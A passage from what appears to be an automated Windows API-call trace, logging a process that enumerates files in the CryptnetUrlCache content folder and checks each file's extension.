nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", cAlternateFileName="024823~1")) returned 1 [0217.751] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="" [0217.751] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bd8410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bd8410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe98d390, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x561, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", cAlternateFileName="0F1583~1")) returned 1 [0217.751] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned="" [0217.751] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf952550, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf952550, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf952550, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", cAlternateFileName="1BB09B~1")) returned 1 [0217.751] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned="" [0217.751] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4c00edb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c00edb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4c00edb0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xf1d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1DAF2884EC4DFA96BA4A58D4DBC9C406", cAlternateFileName="1DAF28~1")) returned 1 [0217.751] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned="" [0217.751] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x580eb5c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x580eb5c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaedd4300, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x145, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="23B523C9E7746F715D33C6527C18EB9D", cAlternateFileName="23B523~1")) returned 1 [0217.751] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D") returned="" [0217.751] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc3791460, ftCreationTime.dwHighDateTime=0x1d2e675, ftLastAccessTime.dwLowDateTime=0xc3791460, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc3791460, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3130B1871A126520A8C47861EFE3ED4D", cAlternateFileName="3130B1~1")) returned 1 [0217.752] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0217.752] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53fdc930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53fdc930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf16fc70, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x58b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", cAlternateFileName="3388EC~1")) returned 1 [0217.752] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned="" [0217.752] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53b19d30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53b19d30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54583d70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", cAlternateFileName="40E450~1")) returned 1 [0217.752] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned="" [0217.752] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54537ab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54537ab0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae76e7e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", cAlternateFileName="4C8F84~1")) returned 1 [0217.752] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned="" [0217.752] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7295ee20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7295ee20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xadfb2060, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", cAlternateFileName="4DD397~1")) returned 1 [0217.752] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned="" [0217.752] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf8b9fd0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf8b9fd0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf8b9fd0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", cAlternateFileName="5080DC~2")) returned 1 [0217.752] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned="" [0217.752] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf86dd10, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf86dd10, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf86dd10, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", cAlternateFileName="5080DC~1")) returned 1 [0217.752] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned="" [0217.752] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf7af630, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", cAlternateFileName="5457A8~1")) returned 1 [0217.752] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned="" [0217.752] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xed9b0820, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xed9b0820, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xed9b0820, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x32d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0217.752] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned="" [0217.752] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf763370, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", cAlternateFileName="705A76~1")) returned 1 [0217.752] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned="" [0217.752] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedb2d5e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedb2d5e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedb2d5e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x22a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0217.753] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0217.753] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x312640, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", cAlternateFileName="7423F8~1")) returned 1 [0217.753] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned="" [0217.753] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd0e4c510, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x1fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0217.753] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0217.753] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b2324c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b2324c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b2324c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x67c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", cAlternateFileName="7B8944~1")) returned 1 [0217.753] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned="" [0217.753] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b199f40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b199f40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b199f40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", cAlternateFileName="7D266D~2")) returned 1 [0217.754] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned="" [0217.754] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefaf7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefaf7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaec313e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", cAlternateFileName="7D266D~1")) returned 1 [0217.754] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned="" [0217.754] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6056b480, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6056b480, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1ef687a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", cAlternateFileName="8059E9~3")) returned 1 [0217.754] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned="" [0217.755] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61210960, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61210960, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaecc9960, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", cAlternateFileName="80273C~1")) returned 1 [0217.755] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned="" [0217.755] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58e24200, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58e24200, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9f5f40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", cAlternateFileName="8059E9~2")) returned 1 [0217.755] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned="" [0217.755] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61236ac0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61236ac0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3b0b01a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", cAlternateFileName="809279~1")) returned 1 [0217.755] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned="" [0217.755] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58394060, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58394060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f739c0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", cAlternateFileName="8059E9~1")) returned 1 [0217.755] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned="" [0217.755] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x62378a40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x62378a40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9a9c80, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", cAlternateFileName="80E4BE~1")) returned 1 [0217.755] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned="" [0217.755] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x613675c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x613675c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69bba4a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", cAlternateFileName="803B9E~1")) returned 1 [0217.755] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned="" [0217.755] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x63c50fe0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x63c50fe0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb100bf40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", cAlternateFileName="803D37~1")) returned 1 [0217.755] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned="" [0217.755] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61021780, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61021780, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb1058200, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", cAlternateFileName="8059E9~4")) returned 1 [0217.755] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned="" [0217.755] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x636a9ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x636a9ba0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb139e040, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", cAlternateFileName="800D31~1")) returned 1 [0217.755] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned="" [0217.755] 